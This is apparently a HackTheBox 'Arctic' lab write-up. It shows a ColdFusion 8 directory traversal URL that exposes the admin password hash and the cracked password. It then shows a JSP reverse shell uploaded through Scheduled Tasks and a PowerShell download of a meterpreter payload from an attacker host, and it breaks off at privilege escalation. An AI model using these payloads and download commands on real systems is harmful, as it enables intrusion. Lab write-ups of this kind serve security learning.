HackTheBox Arctic Writeup

Reconnaissance

Web App Enumeration

Exploitation

Windows Privilege Escalation

________________________________________

Reconnaissance

Run the nmapAutomator.sh script is to automate all of the process of recon/enumeration.

Output reveal port 8500 running unknown service, Let’s browse it

http://10.10.10.11:8500

we have 2 directory lets browse /CFIDE

Web App Enumeration

In /CFIDE directory administrator look intersting lets open it

We get ‘Adobe Coldfusion 8 Administrator’ login page

After googling we find “Adobe ColdFusion - Directory Traversal” exploit

URL : h ttp://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

It reveal password hash lets crack it with crackstation online tool

Password is : happyday lets login

After login in Debugging & Logging Category there is a sub-category Scheduled Tasks allows us to upload files. We can Scheduled New Tasks and upload our shell but first generate our shellcode.

Exploitation

To generate shellcode we will use msfvenom

Lets upload our shell

task name : re

url : http://10.10.14.50/RS2.jsp

publish : check save output to a file

file : C:\ColdFusion8\wwwroot\CFIDE\RS2.jsp

After submit Task we have to run a Python SimpleHTTPServer on port 80 and click on Run Scheduled Tasks and start listner

We got Reverse Shell and User flag is in C:\Users\tolis\Desktop\user.txt directory

We have Low Priv shell so lets upgrade our shell for Privilege Escalation. We can generate meterpreter shell and upload via powershell cmd “powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.50:80/ps.exe', 'ps.exe')"” lets fire up Msfconsole and get reverse shell